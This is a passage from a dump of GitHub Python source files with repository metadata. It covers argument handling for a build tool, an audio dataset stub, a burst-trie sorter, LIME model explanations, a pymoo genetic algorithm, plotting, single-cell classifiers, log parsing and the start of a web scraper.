keep_merge(self, lower_priority):\n \"\"\"\n Merge ``lower_priority`` into self. If the key is already contained in self,\n keep the value of self.\n \"\"\"\n for k, v in lower_priority.items():\n if k not in self:\n self[k] = v\n\n @classmethod\n def load(cls, fpath):\n \"\"\"\n Loads the ArgumentCollection from a json file on the disc.\n \"\"\"\n d = {}\n with open(fpath, 'r') as f:\n try:\n d = json.load(f)\n except ValueError:\n raise ValueError('Invalid json file `{0}`'.format(fpath))\n self = cls()\n parse_assert(isinstance(d, dict), 'json file for ArgumentCollection must start with at dictionary.')\n for k, v in d.items():\n self.add(Argument(k).assign(v))\n return self\n\n def __repr__(self):\n return '{' + ', '.join('{0} = {1}'.format(k, v.value) for k, v in self.items()) + '}'\n\n\ndef collection(*args, **kw):\n \"\"\"\n Creates an ArgumentCollection from args and kw.\n :param args: Accepts list, dict ArgumentCollection or Argument\n :param kw: Calls ArgumentCollection.from_dict.\n :return: An ArgumentCollection created from the arguments\n \"\"\"\n col = ArgumentCollection()\n for arg in args:\n if isinstance(arg, list):\n col.overwrite_merge(collection(arg))\n elif isinstance(arg, ArgumentCollection):\n col.overwrite_merge(arg)\n elif isinstance(arg, dict):\n col.overwrite_merge(ArgumentCollection.from_dict(arg))\n elif isinstance(arg, Argument):\n col.add(arg)\n col.overwrite_merge(ArgumentCollection.from_dict(kw))\n return col\n\n\nclass Argument(Serializable):\n \"\"\"\n Serializable object which represents a key-value pair.\n It can be created from various sources, such as environment-variables, command line options\n or manually, see the :meth:`Argument.retrieve` method for more details.\n The Argument remembers they type of its first assigned value. Assigning another type requires\n changing the type settings. Attempting to set a value with different type will trigger\n an AssertionError.\n \"\"\"\n\n def __init__(self, key, value=None, type=None):\n \"\"\"\n Creats a new Argument with a given key. If value and/or type arguments are present,\n the value/type of this Argument will be set.\n\n :param key: Expected to be a string with length > 0 and match ARGUMENT_KEY_RE.\n :param value: If value is given, it will be immediately assigned to self. if type is None,\n the type(value) will be used.\n :param type: Sets the required type of the argument.\n \"\"\"\n self._key = key\n assert isinstance(key, str) and len(key) > 0\n self._value = None\n self._required_type = None\n self.set_value(value)\n if type is not None:\n self.use_type(type)\n m = ARGUMENT_KEY_RE.match(key)\n if not m:\n raise ValueError('Invalid argument key, expected `{0}`, found: `{1}`'.format(ARGUMENT_KEY_RE_STR, key))\n\n @property\n def key(self):\n return self._key\n\n @property\n def name(self):\n return self._key\n\n def to_json(self):\n d = super().to_json()\n d['value'] = factory.to_json(self._value)\n d['key'] = self.key\n return d\n\n @classmethod\n def from_json(cls, d):\n value = factory.from_json(d['value'])\n key = d['key']\n return cls(key, value=value, type=type(value))\n\n @property\n def type(self):\n \"\"\"\n :return: The type of the value of this Argument. Returns NoneType if the argument was never assigned\n any value.\n \"\"\"\n return self._required_type or type(self._value)\n\n def use_type(self, tp):\n \"\"\"\n Force the value to have a certain type. If a value which is ``not isinstance(value, tp)`` is passed\n to ``set_value()``, a TypeError is raised.\n \"\"\"\n assert tp is None or tp == str or \\\n tp == int or tp == bool or tp == float or tp == list or tp == dict or issubclass(tp, Serializable)\n self._required_type = tp\n self.set_value(self.value)\n\n def get_value(self):\n return self._value\n\n def set_value(self, value):\n \"\"\"\n Assigns ``value`` to self.value. If a type has already been set before, the new value\n must conform to the requirements of it (i.e. isinstance(value, type) must be True).\n Raises: TypeError if type conversion from value to the required type is not successful.\n \"\"\"\n if self._required_type is not None and value is not None:\n # self._value = (self._required_type)(value)\n if not isinstance(value, self._required_type):\n raise TypeError('Argument {0} must be of type {1}, but found type {2}!'.format(\n self.key, self._required_type.__name__, type(value).__name__))\n return\n self._value = value\n\n value = property(get_value, set_value)\n\n def _retrieve_from_single(self, arg):\n \"\"\"\n see :meth:`Argument.retrieve`.\n \"\"\"\n from .metadata import Metadata\n from .config import Config\n from .environment import Environment\n from .option import OptionsCollection\n\n if isinstance(arg, Environment):\n # environment variable\n return arg.get(self.key.upper())\n elif isinstance(arg, OptionsCollection):\n option = arg.all().get(self.key.lower(), None)\n if option:\n return option.value\n elif isinstance(arg, ArgumentCollection):\n v = arg.get(self.key)\n if v is not None:\n return v.value\n elif isinstance(arg, dict):\n # keyword argument\n return arg.get(self.key, None)\n elif isinstance(arg, Metadata):\n return arg.get(self.key)\n elif isinstance(arg, Config):\n return self._retrieve_from_single(arg.arguments)\n elif isinstance(arg, Serializable) or isinstance(arg, list) or is_json_primitive(arg):\n return arg\n return None\n\n def retrieve(self, *args, default=None):\n \"\"\"\n Retrieve the value of self from various sources.\n If multiple arguments are given, the value is retrieved\n from the first source, in which it was found.\n Possible sources are:\n\n * Environment (ctx.env, self.upperkey is used for retrieval)\n * OptionsCollection (ctx.options, self.lowerkey is used for retrieval)\n * a dict where key is used to retrive the value.\n * Metadata (can contain key-value pairs))\n * ArgumentCollection\n * Config (which contains an arguments section)\n * Serializable or primitive or list is assigned to the argument\n\n If the argument is not found in any given source, it's value is not set\n and thus None.\n\n :param default: Default value which is assigned, if the value was not found.\n :return: self\n \"\"\"\n for a in args:\n ret = self._retrieve_from_single(a)\n if ret is not None:\n self.value = ret\n break\n if self.value is None:\n self.value = default\n return self\n\n def retrieve_all(self, default=None):\n \"\"\"\n Retrieves the value of the Argument from:\n\n * ctx.arguments\n * ctx.options\n * ctx.config\n * ctx.meta\n * ctx.env\n\n The order defines the priority in which the various sources are considered.\n\n :param default: Default value which is assigned, if the value was not found.\n :return: self\n \"\"\"\n from wasp import ctx\n self.retrieve(ctx.arguments, ctx.options, ctx.config, ctx.meta, ctx.env, default=default)\n return self\n\n def require_type(self, tp):\n \"\"\"\n Sets the type of the Argument to tp. If the value does\n not conform to the type specified, a ValueError is raised.\n\n :param tp: asdf\n :return: self\n \"\"\"\n self._required_type = tp\n self.set_value(self._value)\n return self\n\n @property\n def is_empty(self):\n \"\"\"\n :return: True if self.value is None, False otherwise\n \"\"\"\n return self.value is None\n\n def assign(self, value):\n \"\"\"\n Assigns the value to self.\n\n :return: self\n \"\"\"\n self.value = value\n return self\n\n def __str__(self):\n return '{0} = `{1}`'.format(self.key, str(self.value))\n\n def __repr__(self):\n return '<Argument: {0} = `{1}`>'.format(self.key, str(self.value))\n\n\nfactory.register(Argument)\n\n\ndef format_string(string, arguments, all_required=False):\n \"\"\"\n Similiar to str.format. Formats a string using the values given in\n an argumentcollection. Example::\n\n In [1]: col = ArgumentCollection()\n In [2]: col['foo'] = 'bar'\n In [3]: col\n Out[3]: {foo = bar}\n In [4]: format_string('This is foo{foo}', col)\n Out[4]: 'This is foobar'\n\n :param string: String to be formatted. Use {argumentkey} for specifying the destination\n where the argument should be inserted.\n :param arguments: ArgumentCollection with values used for formatting the string.\n :param all_required: Defines whether a KeyError is raised if not all tags in\n the format string were found in arguments.\n :return: The formatted string.\n \"\"\"\n kw = {}\n for k, v in arguments.items():\n if v.type != str:\n continue\n kw[k] = v.value\n if all_required:\n s = string.format(**kw)\n else:\n s = UnusedArgFormatter().format(string, **kw)\n return s\n\n\ndef find_argumentkeys_in_string(string):\n \"\"\"\n :return: Returns all argument keys in a format string.\n\n Example::\n In [1]: find_argumentkeys_in_string('This is foo{foo} and {bar}')\n Out[1]: ['foo', 'bar']\n \"\"\"\n exp = re.compile('\\{(?P<argkey>' + ARGUMENT_KEY_RE_STR + ')\\}')\n return exp.findall(string)\n\n\ndef value(arg, default=None):\n \"\"\"\n Return the value of an Argument or create a new argument and immediately\n :meth:`Argument.retrieve_all()` it.\n :param arg: Either argument or string (to be used as key for creating a new Argument).\n :param default: Default value if no value could be retrieved.\n \"\"\"\n if isinstance(arg, Argument):\n if not arg.is_empty:\n ret = arg.value\n else:\n ret = arg.retrieve_all().value\n else:\n assert isinstance(arg, str), 'Expected Argument or str, got `{0}`'.format(type(arg).__name__)\n ret = Argument(arg).retrieve_all(default=default).value\n return ret\n\n\ndef arg(arg, value=None):\n \"\"\"\n Shortcut for creating an Argument with key = arg.\n\n :return: Argument(key)\n \"\"\"\n return Argument(arg, value=value)\n","repo_name":"raffber/wasp","sub_path":"src/wasp/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":15067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409508167","text":"import random\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data.dataset import Dataset\n\nSAMPLE_RATE = 16000\nEXAMPLE_WAV_MIN_SEC = 5\nEXAMPLE_WAV_MAX_SEC = 20\nEXAMPLE_DATASET_SIZE = 200\n\n\nclass RandomDataset(Dataset):\n def __init__(self, **kwargs):\n self.class_num = 48\n\n def __getitem__(self, idx):\n samples = random.randint(EXAMPLE_WAV_MIN_SEC * SAMPLE_RATE, EXAMPLE_WAV_MAX_SEC * SAMPLE_RATE)\n wav = torch.randn(samples)\n label = random.randint(0, self.class_num - 1)\n return wav, label\n\n def __len__(self):\n return EXAMPLE_DATASET_SIZE\n\n def collate_fn(self, samples):\n wavs, labels = [], []\n for wav, label in samples:\n wavs.append(wav)\n labels.append(label)\n return wavs, labels\n","repo_name":"s3prl/s3prl","sub_path":"s3prl/downstream/example/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1943,"dataset":"github-code","pt":"16"} +{"seq_id":"39269290001","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport array\n\nimport mkqsort\nfrom burstSettings import EOS, BURST_LIMIT\n\n\nclass Node(object):\n\n \"\"\"An inner node in a burst trie.\"\"\"\n\n def __init__(self):\n self.links = [None] * 256\n self.links[EOS] = Counter()\n\n def insert(self, data, pointer):\n c = data[pointer]\n if self.links[c] is None:\n self.links[c] = Container(self, c)\n self.links[c].insert(data, pointer + 1)\n \n def output(self, data, buffer, index = 0, prefix = bytearray()):\n \"\"\"Recursively output all children in alphabetical order\"\"\"\n for i, link in enumerate(self.links):\n if not link is None:\n prefix.append(i)\n index = link.output(data, buffer, index, prefix)\n prefix.pop()\n return index\n\n\nclass Counter(object):\n\n \"\"\"A leaf node counting the occurences of a string that has been\n fully consumed in the inner nodes.\n \"\"\"\n\n def __init__(self):\n self.count = 0\n \n def insert(self, data, pointer):\n self.count += 1\n \n def output(self, data, buffer, index, prefix):\n for x in xrange(self.count):\n buffer[index: index + len(prefix)] = prefix\n index += len(prefix)\n return index\n\n\nclass Container(object):\n\n \"\"\"A leaf node containing suffixes for strings that have the same\n prefix represented by the path from the root of the trie to this\n node. The suffixes are indexes to an array containing all the\n strings separated with EOS characters. The prefix is not stored\n explicitly.\n \"\"\"\n\n count = 0\n \n def __init__(self, parent, value):\n self.parent = parent\n self.value = value\n self.count = 0\n self.buf = array.array('i')\n Container.count += 1\n\n def insert(self, data, pointer):\n if self.count == BURST_LIMIT:\n node = self.burst(data)\n node.insert(data, pointer)\n self.parent.links[self.value] = node\n return\n self.buf.append(pointer)\n self.count += 1\n \n def burst(self, data):\n node = Node()\n for i in xrange(self.count):\n node.insert(data, self.buf[i])\n return node\n\n def output(self, data, buffer, index, prefix):\n if self.count > 1:\n mkqsort.sort(data, self.buf, self.count)\n for i in xrange(self.count):\n buffer[index: index + len(prefix)] = prefix\n index += len(prefix)\n j = self.buf[i]\n while True:\n buffer[index] = data[j]\n index += 1\n if data[j] == EOS:\n break\n j += 1\n return index\n\n\ndef read(filename):\n \"\"\"Read the contents of a file to a bytearray. Ensure the final\n character is EOS.\n \"\"\"\n data = bytearray(os.path.getsize(filename) + 1)\n with open(filename, 'rb') as file:\n file.readinto(data)\n if data[-2] == EOS:\n data.pop()\n finalEOS = True\n else:\n data[-1] = EOS\n finalEOS = False\n return data, finalEOS\n\ndef makeTrie(data):\n \"\"\"Scan data for string delimeters and insert the found strings to\n a burst trie.\n \"\"\"\n root = Node()\n start = end = count = 0\n while start < len(data):\n while data[end] != EOS:\n end += 1\n root.insert(data, start)\n count += 1\n start = end = end + 1\n return root\n\ndef main(filename = sys.argv[1]):\n data, finalEOS = read(filename)\n trie = makeTrie(data)\n outputBuffer = bytearray(len(data))\n trie.output(data, outputBuffer)\n if not finalEOS: #don't print a final EOS if there was none in the input\n outputBuffer.pop()\n sys.stdout.write(outputBuffer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"arpol/spa","sub_path":"burst.py","file_name":"burst.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20914760861","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom keras.applications.imagenet_utils import decode_predictions\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport collections\nfrom tensorflow.keras.preprocessing import image\nimport lime\nfrom lime import lime_image\nfrom skimage.segmentation import mark_boundaries\n\nfrom tensorflow.keras.utils import plot_model\n\n\ndef img_to_tensor(img):\n # img_tensor = image.img_to_array(img)\n img_tensor = np.array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n img_tensor /= 255.\n return img_tensor\n\n\ntypes = ['No_Finding', 'Enlarged_Cardiomediastinum', 'Cardiomegaly', 'Lung_Opacity', 'Lung_Lesion', 'Edema',\n 'Consolidation', 'Pneumonia', 'Atelectasis', 'Pneumothorax', 'Pleural_Effusion', 'Pleural_Other',\n 'Fracture', 'Support_Devices']\n\ndatagen = ImageDataGenerator(rescale=1. / 255)\nset = pd.read_csv(\"CheXpert-v1.0-small/csv/top/train_top_lateral.csv\")\ngenerator = datagen.flow_from_dataframe(\n dataframe=set,\n directory=\"\",\n x_col=\"Path\",\n y_col=types,\n classes=types,\n class_mode=\"raw\",\n color_mode=\"rgb\",\n target_size=(224, 224),\n shuffle=False,\n batch_size=8)\n\n\npath_model = os.path.join('saved_models/past/best_model_lateral_03_25_2020_21_11_32.h5')\nmodel = tf.keras.models.load_model(path_model, compile=False)\n# plot_model(model, to_file='model.png', show_shapes=True)\n\nx,y = generator.next()\nfor e in range(0,1):\n img = x[e]\n plt.imshow(img)\n plt.show()\n explainer = lime_image.LimeImageExplainer()\n explanation = explainer.explain_instance(img, model.predict, labels=types, hide_color=0, num_samples=1000, top_labels=5)\n img_tensor = img_to_tensor(img)\n res = model.predict(img_tensor)\n res = np.around(res)\n res = res.astype(int)[0]\n for i in explanation.top_labels: # Gets more interesting label positions\n temp, mask = explanation.get_image_and_mask(i, positive_only=False, num_features=5,\n hide_rest=False\n ,min_weight=0.15\n )\n plt.title(\"Predicted: %d, Original: %d, Pathologie: %s\"%(int(res[i]), int(y[e][i]),types[i]))\n # plt.imshow(x[e] / 2 + 0.5)\n plt.imshow(x[e])\n plt.imshow(mark_boundaries(temp, mask))\n plt.show()\n\n\n","repo_name":"carloslago/IntelligentXray","sub_path":"CheXpert/model_explanation.py","file_name":"model_explanation.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72592563529","text":"from pymoo.algorithms.soo.nonconvex.ga import GA\nfrom pymoo.core.problem import Problem\nfrom pymoo.optimize import minimize\nfrom pymoo.util.reference_direction import get_partition_closest_to_points, ReferenceDirectionFactory\n\n\nclass ReferenceDirectionGA(ReferenceDirectionFactory):\n\n def __init__(self,\n n_dim,\n n_points,\n fun,\n pop_size=20,\n n_gen=200,\n verbose=False,\n **kwargs):\n\n super().__init__(n_dim, **kwargs)\n\n self.n_points = n_points\n self.pop_size = pop_size\n self.n_gen = n_gen\n\n self.fun = fun\n self.verbose = verbose\n\n def _do(self):\n pop_size, n_gen = self.pop_size, self.n_gen\n n_points, n_dim, = self.n_points, self.n_dim\n fun = self.fun\n\n class MyProblem(Problem):\n\n def __init__(self):\n self.n_points = n_points\n self.n_dim = n_dim\n self.n_partitions = get_partition_closest_to_points(n_points, n_dim)\n\n super().__init__(n_var=n_points * n_dim,\n n_obj=1,\n xl=0.0,\n xu=1.0,\n elementwise_evaluation=True)\n\n def get_points(self, x):\n _x = x.reshape((self.n_points, self.n_dim)) ** 2\n _x = _x / _x.sum(axis=1)[:, None]\n return _x\n\n def _evaluate(self, x, out, *args, **kwargs):\n out[\"F\"] = fun(self.get_points(x))\n\n problem = MyProblem()\n\n algorithm = GA(pop_size=pop_size, eliminate_duplicates=True)\n\n res = minimize(problem,\n algorithm,\n termination=('n_gen', n_gen),\n verbose=True)\n\n ref_dirs = problem.get_points(res.X)\n return ref_dirs\n","repo_name":"anyoptimization/pymoo","sub_path":"pymoo/util/ref_dirs/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1804,"dataset":"github-code","pt":"16"} +{"seq_id":"34431828035","text":"\"\"\"Going from Reaction Time (between presses) to Respiration Rate.\n\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport utils\n\nutils.load_matplotlib_settings()\nsubj_palette = utils.load_subject_palette()\n\n\nimport_fname = os.path.join(utils.Config.data_directory, \"derivatives\", \"bct-data_presses.csv\")\nexport_fname = os.path.join(utils.Config.data_directory, \"results\", \"bct-rt2rr.png\")\n\n\ndf = pd.read_csv(import_fname)\n\n\n# Flip data for easier access while plotting.\ntable = df.pivot(index=\"pc\", columns=\"participant_id\", values=\"rt\")\ntable = table.div(1000) # convert RTs to seconds\n\n# Plotting parameters.\nFIGSIZE = (3, 4)\nPLOT_KWARGS = dict(linewidth=.5, alpha=1)\n\n# The ylabels will be used to decide what data to plot.\nAXIS_PARAMS = [\n {\n \"ylabel\": \"Reaction time\\n(seconds)\",\n \"ymax\": 30,\n \"ymajorloc\": 5,\n },\n {\n \"ylabel\": \"smoothed\\n\" + \"Reaction time\\n(seconds)\",\n \"ymax\": 10,\n \"ymajorloc\": 2,\n },\n {\n \"ylabel\": \"smoothed\\n\" + r\"$\\mathrm{Respiration\\ rate,\\ }f_{R}$\" + \"\\n(breaths per minute)\",\n \"ymax\": 80,\n \"ymajorloc\": 20,\n },\n]\n\n\ncolors = [ subj_palette[s] if s in subj_palette else \"gray\" for s in table.columns ]\nxvals = table.index.values\n\nfig, axes = plt.subplots(nrows=3, figsize=FIGSIZE, sharex=True)\n\nfor ax, axdict in zip(axes, AXIS_PARAMS):\n ax.set_prop_cycle(plt.cycler(\"color\", colors))\n\n if \"Respiration\" in axdict[\"ylabel\"]:\n data = table.rolling(10).mean().rdiv(60).values\n elif \"smoothed\" in axdict[\"ylabel\"]:\n data = table.rolling(10).mean().values\n else:\n data = table.values\n\n ax.plot(xvals, data, **PLOT_KWARGS)\n ax.set_ylabel(axdict[\"ylabel\"])\n ax.set_ylim(0, axdict[\"ymax\"])\n ax.yaxis.set(major_locator=plt.MultipleLocator(axdict[\"ymajorloc\"]))\n\n ax.tick_params(which=\"both\", top=False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"left\"].set_position((\"outward\", 5))\n ax.spines[\"right\"].set_position((\"outward\", 5))\n ax.spines[\"bottom\"].set_position((\"outward\", 5))\n ax.grid(axis=\"y\", clip_on=False)\n\nax.set_xbound(lower=0)\nax.set_xlabel(\"Press count\")\nax.xaxis.set(major_locator=plt.MultipleLocator(100),\n minor_locator=plt.MultipleLocator(20))\n\nfig.align_ylabels(axes)\n\n\nplt.savefig(export_fname)\nutils.save_hires_copies(export_fname)\nplt.close()\n","repo_name":"remrama/emp-intervention-pilot-a","sub_path":"plot-bct_rt2rr.py","file_name":"plot-bct_rt2rr.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20961270863","text":"##########################################################\n## ccAF: classifiersV3.py ##\n## ______ ______ __ __ ##\n## /\\ __ \\ /\\ ___\\ /\\ \\/\\ \\ ##\n## \\ \\ __ \\ \\ \\___ \\ \\ \\ \\_\\ \\ ##\n## \\ \\_\\ \\_\\ \\/\\_____\\ \\ \\_____\\ ##\n## \\/_/\\/_/ \\/_____/ \\/_____/ ##\n## @Developed by: Plaisier Lab ##\n## (https://plaisierlab.engineering.asu.edu/) ##\n## Arizona State University ##\n## 242 ISTB1, 550 E Orange St ##\n## Tempe, AZ 85281 ##\n## @Author: Chris Plaisier, Samantha O'Connor ##\n## @License: GNU GPLv3 ##\n## ##\n## If this program is used in your analysis please ##\n## mention who built it. Thanks. :-) ##\n##########################################################\n\n##########################################\n## Load Python packages for classifiers ##\n##########################################\n\n# General\nimport numpy as np\nimport pandas as pd\nimport os\nfrom scipy.sparse import isspmatrix\n\n# sklearn: Support Vector Machine (SVM) rejection\nfrom sklearn.svm import LinearSVC\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.ensemble import BaggingClassifier\n\n# sklearn: Random Forest (RF)\nfrom sklearn.ensemble import RandomForestClassifier\n\n# ACTINN\nimport actinn\n\n# scanpy: K-Nearest Neighbors (KNN)\nimport scanpy as sc\nimport anndata\n\n#################\n## Classifiers ##\n#################\n\nclass Classifier_SVMrej:\n \"\"\"A class designed to facilitate SVMrej classifier construction\n and use.\"\"\"\n def __init__(self, data, labels, cutoff = 0.7):\n self.data = data\n self.labels = labels\n self.cutoff = cutoff\n self.genes = data.var_names\n self.classifier = self.__build_classifier(data, labels)\n\n # Build classifier\n def __build_classifier(self, data, labels):\n train = self.__prep_data(data)\n Classifier = LinearSVC(max_iter = 100000)\n clf = CalibratedClassifierCV(Classifier)\n clf.fit(train, labels)\n return clf\n\n # Predict probability\n def predict_prob(self, newData):\n return np.max(self.classifier.predict_proba(newData), axis=1)\n\n # Prepare data\n def __prep_data(self, data):\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names)\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if isspmatrix(test_data.X):\n data = pd.DataFrame(test_data.X.todense(), index = test_data.obs_names, columns = test_data.var_names)\n else:\n data = pd.DataFrame(test_data.X, index = test_data.obs_names, columns = test_data.var_names)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=data.index, columns = missing)], axis=1)\n return data[list(self.genes)]\n\n # Predict labels with rejection\n def predict_labels(self, new_data, cutoff = None):\n pred_data = self.__prep_predict_data(new_data)\n labels = self.classifier.predict(pred_data)\n if cutoff == None and not self.cutoff == None:\n cutoff = self.cutoff\n if not cutoff == None:\n probs = self.predict_prob(pred_data)\n unlabeled = np.where(probs < cutoff)\n labels[unlabeled] = 'Unknown'\n return labels\n\n\nclass Classifier_KNN:\n \"\"\"A class designed to facilitate scanpy ingetst based\n K-nearest neighbor classifier construction and use.\"\"\"\n def __init__(self, data, label):\n self.data = data\n self.genes = data.var_names\n self.label = label\n # self.classifier = self.__build_classifier(data, labels)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if len(missing)>0:\n data = pd.concat([pd.DataFrame(test_data.X, index=test_data.obs_names, columns=test_data.var_names), pd.DataFrame(0,index=test_data.obs_names, columns = missing)], axis=1)\n data = data[list(self.genes)]\n data_sc = anndata.AnnData(X=data.to_numpy())\n data_sc.var_names = data.columns\n data_sc.obs_names = data.index\n return data_sc\n else:\n return test_data\n \n # Predict labels\n def predict_labels(self, new_data):\n # Subset based on common gene names\n adata_query = self.__prep_predict_data(new_data)\n var_names = self.data.var_names.intersection(adata_query.var_names)\n adata_ref = self.data[:,var_names]\n adata_query = adata_query[:,var_names]\n\n # Run embedding anlaysis using subset\n sc.pp.pca(adata_ref)\n sc.pp.neighbors(adata_ref)\n sc.tl.umap(adata_ref)\n\n # Map the identifiers from the reference dataset to the query dataset\n sc.tl.ingest(adata_query, adata_ref, obs=self.label)\n\n # Save the results in whitfield data object\n return adata_query.obs[self.label]\n\n\nclass Classifier_RF:\n \"\"\"A class designed to facilitate RF classifier construction\n and use. Can also be used for \"\"\"\n def __init__(self, data, labels, cutoff = None):\n self.data = data\n self.genes = data.var_names\n self.labels = labels\n self.cutoff = cutoff\n self.classifier = self.__build_classifier()\n\n # Build classifier\n def __build_classifier(self):\n train = self.__prep_data(self.data)\n clf = RandomForestClassifier(n_estimators=500, oob_score=True)\n clf.fit(train, self.labels)\n return clf\n\n # Predict probability\n def predict_prob(self, newData):\n return np.max(self.classifier.predict_proba(newData), axis=1)\n \n # Prepare data\n def __prep_data(self, data):\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names)\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if isspmatrix(test_data.X):\n data = pd.DataFrame(test_data.X.todense(), index = test_data.obs_names, columns = test_data.var_names)\n else:\n data = pd.DataFrame(test_data.X, index = test_data.obs_names, columns = test_data.var_names)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=data.index, columns = missing)], axis=1)\n return data[list(self.genes)]\n \n # Predict labels with rejection\n def predict_labels(self, new_data, cutoff = None):\n pred_data = self.__prep_predict_data(new_data)\n labels = self.classifier.predict(pred_data)\n if cutoff == None and not self.cutoff == None:\n cutoff = self.cutoff\n if not cutoff == None:\n probs = self.predict_prob(pred_data)\n unlabeled = np.where(probs < cutoff)\n labels[unlabeled] = 'Unknown'\n return labels\n\n\nclass Classifier_ACTINN:\n \"\"\"A class designed to facilitate ACTINN classifier construction\n and use. Can also be used for \"\"\"\n def __init__(self, train, label, learning_rate = 0.0001, num_epochs = 200, minibatch_size = 128, print_cost = True, output_probability = False):\n self.train = train\n self.label = label\n self.learning_rate = learning_rate\n self.num_epochs = num_epochs\n self.minibatch_size = minibatch_size\n self.print_cost = print_cost\n self.output_probability = output_probability\n self.label = label\n self.classifier, self.label_to_type_dict, self.genes = self.__build_classifier()\n\n # Prepare data\n def __prep_data(self, data):\n # Make indicies unique for\n data.var_names_make_unique()\n # Remove all genes with zero counts\n sc.pp.filter_genes(data, min_cells=1)\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names).T\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names).T\n \n # Prepare test data for predicting\n def __prep_predict_data(self, data):\n missing = set(self.genes).difference(data.index)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=missing, columns = data.columns)])\n return data.loc[list(self.genes)]\n\n # Build classifier\n def __build_classifier(self):\n train = self.train\n # Convert into pandas DataFrame\n train_data = self.__prep_data(train)\n labels = self.train.obs[self.label]\n clf, label_to_type_dict, genes = actinn.train_model(train_data, labels, learning_rate = self.learning_rate, num_epochs = self.num_epochs, minibatch_size = self.minibatch_size, print_cost = self.print_cost)\n return clf, label_to_type_dict, genes\n\n # Predict labels with rejection\n def predict_labels(self, newData):\n test_data = self.__prep_data(newData)\n pred_data = self.__prep_predict_data(test_data)\n labels = actinn.predict_new_data(pred_data, self.classifier, self.label_to_type_dict, self.genes)\n return list(labels['celltype'])\n\n # Predict labels with rejection\n def predict_probs(self, newData, axis = -1):\n test_data = self.__prep_data(newData)\n pred_data = self.__prep_predict_data(test_data)\n probs = actinn.predict_probabilities(pred_data, self.classifier, self.genes, axis=axis)\n probs.index = pd.Index([self.label_to_type_dict[i] for i in list(probs.index)])\n return probs\n\n","repo_name":"plaisier-lab/U5_hNSC_Neural_G0","sub_path":"classifiersV3.py","file_name":"classifiersV3.py","file_ext":"py","file_size_in_byte":10206,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"37906616698","text":"# ABB.Ability.IoTEdge.EdgeAgent.Services.CommonDiagnosticCheckService[0]\n# [2022-10-21T13:23:16.4215035Z]\n# : Diagnostic Check is pass. {\"ENABLE_ ...\n\nimport re\n\ninput_dir = '/home/javarotti/Data/ParsedData/ProxyPartial/' # The input directory of log file\noutput_dir = '/home/javarotti/Data/ParsedData/ProxyPartial/' # The output directory of parsing results\nlog_file = 'abb-edge-19-proxy-5.log' # The input log file name\nstep1tag = 'step1-'\nstep2tag = 'step2-'\n\ndef processFile(fileName):\n try:\n with open(fileName) as file:\n lines = file.readlines()\n lines = [line.rstrip() for line in lines]\n return lines\n except Exception as e: \n print('Error reading file' + fileName + \": \" + str(e))\n return []\n\ndef extractPattern(inputList, outputList, regExpression):\n engine = re.compile(regExpression)\n for item in inputList:\n match = engine.match(item)#.replace(' ',''))\n if(match != None):\n trash = match.group(1)\n component = match.group(2).strip()\n timestamp = match.group(3).replace('[','').replace(']','').strip()\n content = removeMultiSpace(match.group(4).removeprefix(': '))\n \n outputList.append(timestamp + ';' + component + ':' + content)\n\ndef removeMultiSpace(input):\n return re.sub(' +', ' ', input)\n\ndef extractTimeStamp(input):\n return input.replace('[','').replace(']','').strip()\n\nresult = processFile(input_dir + step1tag + log_file)\nlogList = []\nextractPattern(result, logList, '(.*?:)(.*\\[[0-9]\\])(\\s*\\[.*T.*Z\\])(.*)')\n\nfile = open(output_dir + step2tag + log_file, \"w+\")\nfor log in logList:\n file.write(str(log) + '\\n')\nfile.close()\n","repo_name":"alexjavarotti/TCCPUCMinas","sub_path":"Parsing/ProxyAdaptor/step2-proxy.py","file_name":"step2-proxy.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29137805628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: amihso\n# Date : 2022/04/14 10:47\n\n# get 请求豆瓣电影前10页\n\nimport urllib.parse\nimport 